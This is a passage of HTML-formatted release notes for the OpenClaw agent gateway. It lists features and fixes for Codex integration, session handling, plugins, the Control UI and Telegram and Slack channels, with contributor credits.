<p>Agents/Codex: default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</p>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</p>
</li>
<li>
<p>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</p>
</li>
<li>
<p>Gateway/CLI: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting.</p>
</li>
<li>
<p>Updates/plugins: keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, avoiding stale WebChat runtime chunks and old Twitch packages after upgrading from 2026.4.29.</p>
</li>
<li>
<p>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</p>
</li>
<li>
<p>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: use the ClawHub artifact resolver response as the install decision before downloading, keeping legacy ZIP fallback and future ClawPack npm-pack installs on the same explicit resolver path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/source checkout: discover source-only plugins such as Codex from the <code>extensions/*</code> workspace while using npm package excludes as the packaged-core boundary, removing the stale core-bundle metadata path.</p>
</li>
<li>
<p>Plugins/ClawHub: install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path and persist artifact kind, npm integrity, shasum, and tarball metadata for update and diagnostics flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI: allow deployments to configure grouped chat message max-width with a validated <code>gateway.controlUi.chatMessageMaxWidth</code> setting instead of patching bundled CSS after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a>.</p>
</li>
<li>
<p>Control UI/Cron: ignore malformed persisted cron rows without valid payloads before they enter UI state and guard stale cron render paths, preventing blank Control UI sections after a bad cron snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>.</p>
</li>
<li>
<p>Control UI/sessions: bound the default Sessions tab query to recent activity and fewer rows, avoiding expensive full-history loads while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</p>
</li>
<li>
<p>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</p>
</li>
<li>
<p>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</p>
</li>
<li>
<p>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings and keep Stop available after reconnect or reload by recovering session-scoped active-run abort state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</p>
</li>
<li>
<p>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</p>
</li>
<li>
<p>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, installing actively used downloadable OpenClaw plugins through the configured external source before marking the config touched for the release.</p>
</li>
<li>
<p>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</p>
</li>
<li>
<p>Control UI: contain the standalone iOS PWA viewport with safe-area-aware document locking, so Add-to-Home-Screen launches cannot scroll past the device bounds. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368888109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76072/hovercard" href="https://github.com/openclaw/openclaw/pull/76072">#76072</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>.</p>
</li>
<li>
<p>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</p>
</li>
<li>
<p>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</p>
</li>
<li>
<p>Control UI/WebChat: use high-contrast text selection colors so highlighted chat text stays visible across themes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>.</p>
</li>
<li>
<p>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</p>
</li>
<li>
<p>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</p>
</li>
<li>
<p>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</p>
</li>
<li>
<p>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</p>
</li>
<li>
<p>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</p>
</li>
<li>
<p>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</p>
</li>
<li>
<p>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</p>
</li>
<li>
<p>Control UI/chat: show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly instead of clearing the composer silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</p>
</li>
<li>
<p>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</p>
</li>
<li>
<p>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</p>
</li>
<li>
